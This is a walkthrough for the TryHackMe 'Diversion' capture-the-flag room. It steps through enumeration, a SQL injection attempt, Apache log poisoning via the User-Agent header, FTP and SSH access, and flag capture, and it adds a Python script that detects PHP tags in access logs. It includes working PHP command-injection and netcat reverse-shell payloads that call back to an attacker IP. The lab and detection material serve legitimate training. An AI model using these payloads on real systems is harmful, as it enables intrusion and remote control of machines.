Welcome to the Diversion walkthrough! This guide will take you through the steps to identify and exploit the vulnerabilities within this virtual machine. Let’s get started!
Room link:
https://tryhackme.com/jr/diversionIb
Step 1: Enumeration
Start with Nmap Scan:
- Begin by scanning the target machine to identify open ports and services.
nmap -sC -sV -oN nmap_initial_scan.txt <TARGET_IP>
Review Nmap Results:
- The scan reveals the following open ports:
  - 22/tcp: SSH
  - 80/tcp: HTTP
  - 21/tcp: FTP
Step 2: Investigate HTTP Service
Access the Web Server:
- Open the web browser and navigate to http://<TARGET_IP>/. You’ll find a login page.
Inspect the Source Code:
- Check the source code of the login page for any clues or vulnerabilities.
Try SQL Injection:
- Attempt a basic SQL injection to bypass the login:
Username: admin' OR '1'='1
Password: anything
Unsuccessful Login:
- The injection is not successful and you cannot log into the system: it was a diversion!
Step 3: Explore the Web Application
Directory Busting:
- Check for other directories on the web server:
dirsearch -u <TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
- You’ll find a test directory with a single log.txt file. Within it you will see mention of an access_log.php file, which can be accessed at http://<TARGET_IP>/access_log.php.
Step 4: Code Injection via Apache Logs
Read the /etc/passwd file:
- Use a tool like curl to inject a cat command into the User-Agent header:
curl -A "<?php system('cat /etc/passwd'); ?>" http://<TARGET_IP>
- Navigate to the access_log.php file and make note of a user named jimmy.
- For a more advanced technique, challenge yourself to inject reverse shell code into the log file. For example, start a listener and then send the payload in the User-Agent header:
rlwrap -cAr nc -lvnp 80
curl -A "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.9.2.91 80 >/tmp/f'); ?>" http://10.10.158.198/
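From the defender's side, this poisoning attempt is visible in the access log itself, because the PHP tags are written there as part of the request. The following Python script is an added example and not part of the original room or walkthrough: it parses Apache combined-format log lines (the sample lines are constructed, reusing the walkthrough's User-Agent payload) and flags any client-controlled field that carries a PHP open tag, which is what an access-log viewer must never hand to include().

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status size "referer" "user-agent"
# Quoted fields may contain escaped quotes (\"), so allow backslash escapes.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + QUOTED + r')" '
    r'"(?P<agent>' + QUOTED + r')"$'
)

# PHP open tags (<?php ... or the short echo tag <?=). No legitimate client
# sends these in a request line, Referer or User-Agent.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)

# Client-controlled fields that end up verbatim in the log file.
CLIENT_FIELDS = ("request", "referer", "agent")

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def find_poisoning(lines):
    """Return (line_no, host, field, value) for every field containing a PHP tag."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; a real deployment would count these too
        for field in CLIENT_FIELDS:
            if PHP_TAG_RE.search(rec[field]):
                hits.append((n, rec["host"], field, rec[field]))
    return hits

# Constructed sample log: line 2 carries the walkthrough's User-Agent payload,
# line 4 a short-tag probe in the Referer; lines 1 and 3 are benign.
SAMPLE_LOG = [
    '10.9.2.91 - - [10/Mar/2024:10:15:01 +0000] "GET / HTTP/1.1" 200 1043 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"',
    '10.9.2.91 - - [10/Mar/2024:10:15:07 +0000] "GET / HTTP/1.1" 200 1043 "-" "<?php system(\'cat /etc/passwd\'); ?>"',
    '10.9.2.91 - - [10/Mar/2024:10:15:09 +0000] "GET /access_log.php HTTP/1.1" 200 5120 "-" "curl/7.88.1"',
    '10.9.2.91 - - [10/Mar/2024:10:15:12 +0000] "GET / HTTP/1.1" 200 1043 "<?=1?>" "curl/7.88.1"',
]

if __name__ == "__main__":
    for line_no, host, field, value in find_poisoning(SAMPLE_LOG):
        print(f"line {line_no}: PHP tag in {field} from {host}: {value!r}")
```

Point the script at a real access.log (one line per list element) to audit it; a hit followed shortly by a request for the log-viewing page is the sequence this walkthrough produces.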
Step 5: Exploit FTP
FTP Enumeration:
- Connect to the FTP service and look for any interesting files:
ftp <TARGET_IP>
- Check for anonymous login or default credentials. You will find an adminnote.txt file with mention of weak passwords being used: password123
Step 6: SSH
- We can SSH into the user account jimmy using the found credentials: password123
ssh jimmy@<TARGET_IP>
Step 7: Privilege Escalation
Check Sudo Permissions:
- Once you have a shell, check for any sudo permissions:
sudo -l
Exploit Weak Passwords:
- If you find any users with weak passwords, use them to escalate privileges:
su <username>
Step 8: Capture the Flags
Locate User Flag:
- Navigate to the user’s home directory and capture the user flag:
cat /home/<username>/local.txt
Locate Root Flag:
- After escalating privileges, capture the root flag:
cat /root/proof.txt
Conclusion
Congratulations! You’ve successfully exploited the Diversion VM and captured all the flags. This walkthrough covered SQL injection, Apache log file code injection, FTP, and privilege escalation techniques. Always remember to follow ethical guidelines and use your skills for good.
Happy hacking!